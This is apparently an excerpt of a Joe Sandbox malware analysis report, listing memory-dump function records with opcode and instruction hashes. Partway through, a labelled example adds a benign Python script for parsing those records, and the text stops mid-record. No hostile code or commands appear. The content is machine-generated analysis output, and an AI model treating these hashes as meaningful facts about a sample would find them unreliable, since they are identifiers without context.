                                                                                                                                                                                                                      • Instruction ID: 28730c8e2cdbd5fddcce2d98a17185273d3ce606aa4dde1abe130e3d19ddad39
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3218E72A00209EFDF129F98CC44BAEBBBAEF48360F240456F901A7351DB34DD56AB50
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                                                                      • Instruction ID: 3ee2a731f7fb99dee2faa27bfcbad6f849227f0b884be4a4b5cf798f7d63fdea
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5911B273601604FFD7229B54CC41F9BBBB9EF80764F24802AF6099B190DAB5ED44EB51
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9343c276344e84c92c9421892525ebcbba24df9b37c2371e5b92a6e9b773b3a0
                                                                                                                                                                                                                      • Instruction ID: 19d0de3600e4028c8451c3a5f3acc38532e2005cbfd033da96a20529ba4ba363
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9343c276344e84c92c9421892525ebcbba24df9b37c2371e5b92a6e9b773b3a0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE11AB35B01611DBCB11CF49C5D0A6EBBE9EF4A7A0B25406DED08DF205DAB6DD02D790
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      • Instruction ID: 2813746a5b1c020496680b546460a6513352fdbfebcb3a7335cb69177bd391e0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f600e50dac6ae584a1feb26ce4db47d5193a6bd13e5398b2aafbcb7dfea749e9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4211AC36A41644AFCB25CF59D841B567FA8EB8AB64F104119FD04AB390C774FD41EF60
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b905af11d986978da5dc8e289cf627839e6e21b68732f2f093280aa6d680fef6
                                                                                                                                                                                                                      • Instruction ID: b38d2de3fe663f11aad9a125010a918ccaa073268c1fff22fbdc1b8174320c2b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b905af11d986978da5dc8e289cf627839e6e21b68732f2f093280aa6d680fef6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A111C6362006119FD7619A29DC80F56B7E5FFC4711F194459EAC6C76A8DB38A802C790
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4b0b68d45f88934a41cf7c56064dbeaa4b979251142566b60e51791acad2f0ce
                                                                                                                                                                                                                      • Instruction ID: 7c30c18f2bb36e5790fcdcd06dd02d1a00d27ecf80f0a7628d94a1045c02b0e5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b0b68d45f88934a41cf7c56064dbeaa4b979251142566b60e51791acad2f0ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C711C272D00B14ABCB21EF58DD81F5EF7B8EF88750F90445AE908BB201D734AE05AB61
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 02bc8714011e877d645b8f2c9d6c52f4b82fe0223e5646375128c3c8b2ebef94
                                                                                                                                                                                                                      • Instruction ID: f104cbd4a72aebc25baf10874c9fdd010656651237b12dae606ab99ca42851e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02bc8714011e877d645b8f2c9d6c52f4b82fe0223e5646375128c3c8b2ebef94
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11019E765101089FC725DB19D849F56BBFDFB85328F20826AE0498B261C778AC46DB90
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                                                                      • Instruction ID: c8784ff2ecb55eac04a7a27d7090ef85b8f600373ed071c27f4460a9cbb26ffb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C11E9B7A016C59BD7229758CD44B6677A4EB027A8F1D00B1ED42CF652F32CCD46F250
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                                                                      • Instruction ID: 8e91119b140b1a3b71a1547a2b3117937ebea9f3dc175a340bbec5e4012b6299
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4501D232A00106AFDB259F54CE03F5A7AA9EF40BA0F158128F9159B260E775DE40E790
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                                                      • Instruction ID: f58e6ffb31c22aa5c0949871a645f525cb4852b0738aeb7e116b55d1b6d3751f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38012E32804B119BCB308F16D840A377BA8EF55B70B008A2DFCD98B680C735E800EBA1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fab5332683f1ad64913daf95dce5a6db287e821ad8c4fcc8397b663e6a72293a
                                                                                                                                                                                                                      • Instruction ID: 039390d83c040bd8bf84a96fe65397303ba0520e9b9594568e69265a4b061355
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fab5332683f1ad64913daf95dce5a6db287e821ad8c4fcc8397b663e6a72293a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9801C0725416009BC362DF1C9C40E16B7EAEB85770B2542A5EAE8DB1AAE738D801CBD0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b4d38d60308cd168e3d6f8147acdd44ad105896e29a7575ce14575af3e9439ed
                                                                                                                                                                                                                      • Instruction ID: eb7e50742366d4acb0e9d89f85a97b33264ccf26b747d19ea9e1e8fdc2ee3e5c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4d38d60308cd168e3d6f8147acdd44ad105896e29a7575ce14575af3e9439ed
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40118B32641240EFCB16EF59CD81F96BBB8FF44B94F240065FE059B662C239ED01EA90
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
• API String ID:
• Opcode ID: 24cc8bdd3b43a748b240f4f8fde2305a763df44bbb8218665ccb7a276681084f
• Instruction ID: 489011922a3ca83eba9a0a3616ce63ad0d3d630286a5fb61facae51de0d6f106
• Opcode Fuzzy Hash: 24cc8bdd3b43a748b240f4f8fde2305a763df44bbb8218665ccb7a276681084f
• Instruction Fuzzy Hash: 6611A071A02218ABDF65EB64CC42FE8B3B4AF44710F5041D4B718E60E1DB74AE81EF85

Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
• Instruction ID: 3a0cadbd8a22a76d4a847d2212d2a575f484dfbf6add71716717ec5f42dc5e99
• Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
• Instruction Fuzzy Hash: 45019E33A001108BEF559A2DD880B927BA6AFD4720F9545B9FD05CF256DA719C81E790

Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 67e1ff4198b9d61ecce6ff89de71bfa5a22cead048e1abf007381b1756b3f66c
• Instruction ID: 52fa119b0d3ffc1639067850f01f93ec504ffc891127cb703e60043044106394
• Opcode Fuzzy Hash: 67e1ff4198b9d61ecce6ff89de71bfa5a22cead048e1abf007381b1756b3f66c
• Instruction Fuzzy Hash: 13112973900019ABCB12DB94CC85EEFBB7CEF48358F044166E906E7211EA34EA15DBE1

Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9e149e63e9bf1185c5f8b0f59dfee7aeff595d2b43a08dfa6699e88e1f5bb20f
• Instruction ID: 596aded08632be1eeaefcca6e2d78dc7d5807afa2ae454270c235aa1af8292bb
• Opcode Fuzzy Hash: 9e149e63e9bf1185c5f8b0f59dfee7aeff595d2b43a08dfa6699e88e1f5bb20f
• Instruction Fuzzy Hash: F611C4366441469FC711CF58E810BA6B7BAFF5A314F1C815AE849CB315D732EC85EBA0

Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 92f63f4c0e571622f3fb07cf1301f92fb246760c229ba0e8476a6c4b1a3c00d4
• Instruction ID: bc8e6569d8322067c7e4321829aa6ef1976d5c266261bf982e08b6649d1114b0
• Opcode Fuzzy Hash: 92f63f4c0e571622f3fb07cf1301f92fb246760c229ba0e8476a6c4b1a3c00d4
• Instruction Fuzzy Hash: 5511E8B1E002199BCB04DFA9D541AAEB7F8EF48750F10806AF905E7351D678EE019BA4

Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2d1952569085014fd5d05d1651ff41ba652fc55cbaa1e7c81da840d5deb9b0cf
• Instruction ID: c2bdf5cd11309e36facaa29651dca371e58d0f90b8a2b3bf6de7d4c9e980da1d
• Opcode Fuzzy Hash: 2d1952569085014fd5d05d1651ff41ba652fc55cbaa1e7c81da840d5deb9b0cf
• Instruction Fuzzy Hash: 0701D8319401509BC732AF16E844E3AB7A9FF52B61B14443EF6455B211C73DDC41EB91

Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1809c6b97c54433981291cd56fa58791a2bc3601cbef79cabf24fad6c851aed0
• Instruction ID: fdcc3bfd93da90057cf04b3fd36a6353056a77d82582ab88812dd8c0fb898faa
• Opcode Fuzzy Hash: 1809c6b97c54433981291cd56fa58791a2bc3601cbef79cabf24fad6c851aed0
• Instruction Fuzzy Hash: DB116D71A0120DABCB04EFA4CC55FEE7BB9EB44754F104059F90597290EA39AE11EB91

Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
• Instruction ID: 54dc70c3a4816e123c9c3d81a559758d14ebada25c9d2c20603b27774af4666d
• Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
• Instruction Fuzzy Hash: 4B012872600744DFEF22966AC900FA773E9FFC4360F158419A986CB540DE74E801EBA0

Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c39c6822bf01dae7cd27571a5697e226f3316889f07237ffaee6771dca242412
• Instruction ID: bda4c321d5ba2e3f4bfa6f47d74371437e0632c581393f7c7e71eac598b0ad34
• Opcode Fuzzy Hash: c39c6822bf01dae7cd27571a5697e226f3316889f07237ffaee6771dca242412
• Instruction Fuzzy Hash: 5E01F7716005007FC311AB39CD41E57B7ECFF8A7A1B040625B60583552DB68EC05D6E0

Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f3291393fa595667fb7a0fecca9b3a6efe356f39f43de887abb2ff4208a67024
• Instruction ID: 4fbbccd862984e1d963ff2e78628f33f8b8d9b8937ef615004c4a50820142580
• Opcode Fuzzy Hash: f3291393fa595667fb7a0fecca9b3a6efe356f39f43de887abb2ff4208a67024
• Instruction Fuzzy Hash: 24014C336142019BC320EF68C849AA7B7A9EF48764F24412AF999D7280E7389D05D7D1

Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b4ae01eb301f5fa2def500af74fa4d3f60135dd6262d1d45778430998369c328
• Instruction ID: 3482e6ea41a0969f70b6896e15ffeb557c87677e6c0fbb7628723790e4cb80aa
• Opcode Fuzzy Hash: b4ae01eb301f5fa2def500af74fa4d3f60135dd6262d1d45778430998369c328
• Instruction Fuzzy Hash: A0115E71A0120DABCB19EF64C952EAE7BB5EB48350F008059FC0597340DA39ED11EB90
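Every function record in this part of the report has the same shape: a "Memory Dump Source" header, the .sdmp the code was recovered from with its mapping offset, the IDA plugin snapshot, and a "Similarity" block of Opcode/Instruction IDs and fuzzy hashes. When a report runs to hundreds of such records, reading them by eye is not practical. The Python below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses records in this layout into dicts, cross-checks that the base address embedded in the dump file name matches the stated Offset, checks that Opcode ID and Opcode Fuzzy Hash agree (they do in every record on this page), and lists Opcode IDs that occur more than once, which is the first thing you want when comparing dumps across samples. The SAMPLE text is a constructed excerpt: its first two records are copied from this page and the third repeats the first record's hashes so the duplicate check has something to find.

```python
"""Parse Joe Sandbox per-function metadata records into structured rows.

Added example (not report or vendor code). Record layout follows the
'Memory Dump Source' / 'Similarity' blocks on this page."""
import re
from collections import Counter

# Constructed sample: records 1 and 2 are from this page, record 3 is a
# deliberate repeat of record 1 to exercise duplicate_opcode_ids().
_REC1 = """Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
• Instruction ID: 3a0cadbd8a22a76d4a847d2212d2a575f484dfbf6add71716717ec5f42dc5e99
• Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
• Instruction Fuzzy Hash: 45019E33A001108BEF559A2DD880B927BA6AFD4720F9545B9FD05CF256DA719C81E790
"""
_REC2 = """Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 67e1ff4198b9d61ecce6ff89de71bfa5a22cead048e1abf007381b1756b3f66c
• Instruction ID: 52fa119b0d3ffc1639067850f01f93ec504ffc891127cb703e60043044106394
• Opcode Fuzzy Hash: 67e1ff4198b9d61ecce6ff89de71bfa5a22cead048e1abf007381b1756b3f66c
• Instruction Fuzzy Hash: 13112973900019ABCB12DB94CC85EEFBB7CEF48358F044166E906E7211EA34EA15DBE1
"""
SAMPLE = _REC1 + _REC2 + _REC1

# "• Key: value" (bullet optional, any indentation; value may be empty)
FIELD = re.compile(r"^\s*(?:•\s*)?([A-Za-z ]+?):\s*(.*?)\s*$")
SECTION_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def _key(name):
    return name.strip().lower().replace(" ", "_")


def parse_records(text):
    """One dict per record; a record starts at each 'Memory Dump Source'.

    The composite 'Source File' line is split into source_file, offset
    and based_on_pe. Empty fields (e.g. 'API ID:') become None."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        if line in SECTION_HEADERS or current is None:
            continue
        m = FIELD.match(line)
        if not m:
            continue
        key, value = _key(m.group(1)), m.group(2)
        if key == "source_file":
            parts = [p.strip() for p in value.split(",")]
            current["source_file"] = parts[0]
            for part in parts[1:]:          # "Offset: 00F10000", "based on PE: true"
                k, _, v = part.partition(":")
                current[_key(k)] = v.strip()
        else:
            current[key] = value or None
    return records


def dump_base_address(source_file):
    """Fourth dot-separated field of the .sdmp name, read as hex; on this
    page it always equals the record's Offset (assumption for other fields)."""
    return int(source_file.split(".")[3], 16)


def base_matches_offset(rec):
    return dump_base_address(rec["source_file"]) == int(rec["offset"], 16)


def fuzzy_hash_consistent(rec):
    """Opcode ID and Opcode Fuzzy Hash are identical in every record here."""
    return rec.get("opcode_id") == rec.get("opcode_fuzzy_hash")


def duplicate_opcode_ids(records):
    """Opcode IDs that appear in more than one record, with their counts."""
    counts = Counter(r["opcode_id"] for r in records if r.get("opcode_id"))
    return {k: n for k, n in counts.items() if n > 1}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records;", "duplicates:", duplicate_opcode_ids(recs))
```

Feed it the text of the whole disassembly section rather than SAMPLE and the same functions give you, per dump, which Opcode IDs repeat and whether any record's file name disagrees with its stated offset (a sign the extraction mangled a line).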
Memory Dump Source
• Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_f10000_docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 22298bc4077b3dcca71229903421bb2714fac90ea57f6c4bf3510bcec8178882
• Instruction ID: 1a171edbb9d0641c0568b9a6852af78aa6dae35091479099220949789ea4047d
• Opcode Fuzzy Hash: 22298bc4077b3dcca71229903421bb2714fac90ea57f6c4bf3510bcec8178882
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8511ADB16083089FC700DF69C842A9BBBF8EF88710F00851EF998D7391E634E900CB92
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: da931efc74627421cc13dc010bd97162c9262f39bb18a87adaaae3f46cbe60d7
                                                                                                                                                                                                                      • Instruction ID: 1999ca193996ddabae239a4ed895b9bdb4d31c0952dea8222a000f774cdbb117
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da931efc74627421cc13dc010bd97162c9262f39bb18a87adaaae3f46cbe60d7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE118EB16043089FC300DF69C842A8BBBF8EF89750F00851EF958D7361E634E900DB92
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                                                                                      • Instruction ID: 9bdf72d0f62bb68ae4a1f1d71c8d234fef1b76d852a4250de53539f897279509
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 020124332006059FD7218AADC840F96BBEAFBC1300F454859F682CB664DBB8F840C790
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                                                      • Instruction ID: 5a046aaf7e8392ca46a74de43fbcbd2d3f9939c55441a8bad00de1cbddd67513
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01017C32604984DFE7268B1DC948F2677ECEF44760F0A04A5FA05CB6D1D6A8DE44E621
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: d80ec7660696a51da54459710e2e6e67d2be139572f508193f99ea6f18c4a93c
                                                                                                                                                                                                                      • Instruction ID: 589d34f9b7904f6b4aa5a8178cadae9a83b6e1e5434e93d82dd1e0d1f042ccad
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d80ec7660696a51da54459710e2e6e67d2be139572f508193f99ea6f18c4a93c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA01D432B10604DBC714EB66DD02AAB73A8FF81770F158029B8019B242DE28DD02E390
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
